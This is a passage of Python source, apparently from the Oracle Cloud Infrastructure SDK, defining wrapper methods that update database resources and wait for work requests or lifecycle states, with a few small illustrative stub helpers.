evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_db_home_and_wait_for_work_request(self, db_home_id, update_db_home_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_db_home` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_home_id: (required)
The Database Home `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDbHomeDetails update_db_home_details: (required)
Request to update the properties of a Database Home.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_db_home`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_db_home(db_home_id, update_db_home_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_db_home_and_wait_for_state(self, db_home_id, update_db_home_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_db_home` and waits for the :py:class:`~oci.database.models.DbHome` acted upon
to enter the given state(s).
:param str db_home_id: (required)
The Database Home `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDbHomeDetails update_db_home_details: (required)
Request to update the properties of a Database Home.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbHome.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_db_home`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_db_home(db_home_id, update_db_home_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_home(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_db_system_and_wait_for_work_request(self, db_system_id, update_db_system_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_db_system` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDbSystemDetails update_db_system_details: (required)
Request to update the properties of a DB system.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_db_system(db_system_id, update_db_system_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_db_system_and_wait_for_state(self, db_system_id, update_db_system_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_db_system` and waits for the :py:class:`~oci.database.models.DbSystem` acted upon
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDbSystemDetails update_db_system_details: (required)
Request to update the properties of a DB system.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbSystem.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_db_system(db_system_id, update_db_system_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_system(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
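# The evaluate_response lambda passed to oci.wait_until above checks that the
# resource reports a lifecycle_state at all and that, lowercased, the state is
# one of the requested states. A standalone sketch of that predicate, using
# hypothetical stub objects in place of a real OCI response (not SDK types):
class _StubResource(object):
    def __init__(self, lifecycle_state):
        self.lifecycle_state = lifecycle_state

class _StubResponse(object):
    def __init__(self, data):
        self.data = data

def _in_wait_states(response, lowered_wait_for_states):
    # Mirrors the waiter predicate: a falsy (unset) state never matches.
    state = getattr(response.data, 'lifecycle_state')
    return bool(state) and state.lower() in lowered_wait_for_states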
def update_exadata_infrastructure_and_wait_for_work_request(self, exadata_infrastructure_id, update_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_exadata_infrastructure` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExadataInfrastructureDetails update_exadata_infrastructure_details: (required)
Request to update the properties of an Exadata Cloud@Customer infrastructure.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_exadata_infrastructure(exadata_infrastructure_id, update_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_exadata_infrastructure_and_wait_for_state(self, exadata_infrastructure_id, update_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.ExadataInfrastructure` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExadataInfrastructureDetails update_exadata_infrastructure_details: (required)
Request to update the properties of an Exadata Cloud@Customer infrastructure.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_exadata_infrastructure(exadata_infrastructure_id, update_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_exadata_iorm_config_and_wait_for_work_request(self, db_system_id, exadata_iorm_config_update_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_exadata_iorm_config` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ExadataIormConfigUpdateDetails exadata_iorm_config_update_details: (required)
Request to perform database update.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_exadata_iorm_config`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_exadata_iorm_config(db_system_id, exadata_iorm_config_update_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_exadata_iorm_config_and_wait_for_state(self, db_system_id, exadata_iorm_config_update_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_exadata_iorm_config` and waits for the :py:class:`~oci.database.models.ExadataIormConfig` acted upon
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ExadataIormConfigUpdateDetails exadata_iorm_config_update_details: (required)
Request to perform database update.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataIormConfig.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_exadata_iorm_config`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_exadata_iorm_config(db_system_id, exadata_iorm_config_update_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_iorm_config(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
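# When a waiter fails, the helpers above wrap the failure in
# oci.exceptions.CompositeOperationError so the caller still receives the
# already-completed operation result via partial_results. A sketch of that
# recovery pattern for callers, using a hypothetical stand-in exception with
# the same partial_results/cause attributes (not the real SDK class):
class _StubCompositeOperationError(Exception):
    def __init__(self, partial_results=None, cause=None):
        super(_StubCompositeOperationError, self).__init__(str(cause))
        self.partial_results = partial_results or []
        self.cause = cause

def _partial_results_of(func):
    # Run a composite operation; on failure, salvage whatever completed.
    try:
        return func()
    except _StubCompositeOperationError as e:
        return e.partial_results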
def update_external_container_database_and_wait_for_work_request(self, external_container_database_id, update_external_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_container_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalContainerDatabaseDetails update_external_container_database_details: (required)
Request to update the properties of an
:func:`create_external_container_database_details` resource.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_container_database(external_container_database_id, update_external_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_container_database_and_wait_for_state(self, external_container_database_id, update_external_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_container_database` and waits for the :py:class:`~oci.database.models.ExternalContainerDatabase` acted upon
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalContainerDatabaseDetails update_external_container_database_details: (required)
Request to update the properties of an
:func:`create_external_container_database_details` resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_container_database(external_container_database_id, update_external_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_database_connector_and_wait_for_work_request(self, external_database_connector_id, update_external_database_connector_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_database_connector` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalDatabaseConnectorDetails update_external_database_connector_details: (required)
Request to update the properties of an external database connector.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_database_connector(external_database_connector_id, update_external_database_connector_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_database_connector_and_wait_for_state(self, external_database_connector_id, update_external_database_connector_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_database_connector` and waits for the :py:class:`~oci.database.models.ExternalDatabaseConnector` acted upon
to enter the given state(s).
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalDatabaseConnectorDetails update_external_database_connector_details: (required)
Request to update the properties of an external database connector.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalDatabaseConnector.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_database_connector(external_database_connector_id, update_external_database_connector_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_database_connector(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_non_container_database_and_wait_for_work_request(self, external_non_container_database_id, update_external_non_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_non_container_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalNonContainerDatabaseDetails update_external_non_container_database_details: (required)
Request to update the properties of an external non-container database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_non_container_database(external_non_container_database_id, update_external_non_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_non_container_database_and_wait_for_state(self, external_non_container_database_id, update_external_non_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_non_container_database` and waits for the :py:class:`~oci.database.models.ExternalNonContainerDatabase` acted upon
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalNonContainerDatabaseDetails update_external_non_container_database_details: (required)
Request to update the properties of an external non-container database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalNonContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_non_container_database(external_non_container_database_id, update_external_non_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_non_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_pluggable_database_and_wait_for_work_request(self, external_pluggable_database_id, update_external_pluggable_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_pluggable_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalPluggableDatabaseDetails update_external_pluggable_database_details: (required)
Request to update the properties of an external pluggable database resource.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_pluggable_database(external_pluggable_database_id, update_external_pluggable_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_pluggable_database_and_wait_for_state(self, external_pluggable_database_id, update_external_pluggable_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_pluggable_database` and waits for the :py:class:`~oci.database.models.ExternalPluggableDatabase` acted upon
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalPluggableDatabaseDetails update_external_pluggable_database_details: (required)
Request to update the properties of an external pluggable database resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalPluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_pluggable_database(external_pluggable_database_id, update_external_pluggable_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_key_store_and_wait_for_state(self, key_store_id, update_key_store_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_key_store` and waits for the :py:class:`~oci.database.models.KeyStore` acted upon
to enter the given state(s).
:param str key_store_id: (required)
The `OCID`__ of the key store.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateKeyStoreDetails update_key_store_details: (required)
Request to update the attributes of a key store.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.KeyStore.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_key_store`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_key_store(key_store_id, update_key_store_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_key_store(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_maintenance_run_and_wait_for_state(self, maintenance_run_id, update_maintenance_run_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
